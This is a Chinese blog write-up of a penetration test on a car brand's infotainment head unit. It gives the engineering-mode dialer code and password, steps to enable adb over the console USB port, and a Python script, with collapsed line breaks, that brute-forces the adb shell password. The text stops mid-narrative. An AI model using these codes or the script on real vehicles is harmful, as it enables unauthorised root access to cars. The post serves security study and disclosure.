Hacked某安汽车车机系统

文章列表

Hacked某安汽车车机系统

很久之前尝试对某安汽车的车机系统进行渗透测试，但是却卡在入口无法进入，尝试暴力破解但是字典不够强大，没能成功。前段时间看到了绿盟科技博客的《新型车机，如何攻防？》感觉有点熟悉，再次探索发现可以获得车机系统root权限，遂事后诸葛亮一波，就当是学习笔记了。

通过在论坛、QQ群、贴吧收集到这款车型进入工程模式的方法，在拨号键盘输入*#*#888，然后点击拨号，如图：

进入密码认证界面，输入收集到的密码：369875，如图：

此时进入工程模式，可以看到工程模式的功能，如图：

点击“USB切换”可以将中控台下边的USB口切换为adb模式，从而通过数据线连接车机系统adb shell。可能我们需要启动USB调试，首先点击“打开系统设置原始界面 ——> Settings”，如图：

此时进入系统设置界面，可以看到下边有“关于智能平台”，如图：

点击“关于智能平台”后可以看到Android 版本、硬件型号版本号等等信息，如图：

连续点击7次版本号后开启开发者模式，然后开启USB调试，如图：

在连接adb shell时提示需要输入密码，如图：

当时卡在这里很久，编写Python脚本使用字典爆破了很久也没成功，Python3脚本如下：


import pexpect
import random
import sys
# Open the password dictionary fileif len(sys.argv) < 2:print("Usage: python3",sys.argv[0],"password.txt")exit(0)
else:print("ADB Shell Brute         --By Infiltrator")with open(sys.argv[1]) as f:passwords = f.readlines()adb = pexpect.spawnu("adb shell",timeout=1)#adb.logfile_read = sys.stdout# Try each password in the dictionary filefor password in passwords:password = password.strip()  # Remove leading/trailing whitespace# Wait for the password prompttry:s = adb.expect("password:")except:print("[!] Please check adb if connected!")exit(1)# Enter the passwordprint("\\r[*] Testing password:",password,end='')adb.sendline(password)# Wait for the output and check if we successfully logged ins = adb.expect(["verify success!", "verify failed!"])if s == 0:# Login succeeded, we're doneprint("\\n[+] Success! Password is:", password)breakelse:# Login failed, try the next passwordcontinue

直到看到新型车机，如何攻防？，文中逆向分析获得的密码立即让我觉得很是熟悉，如图：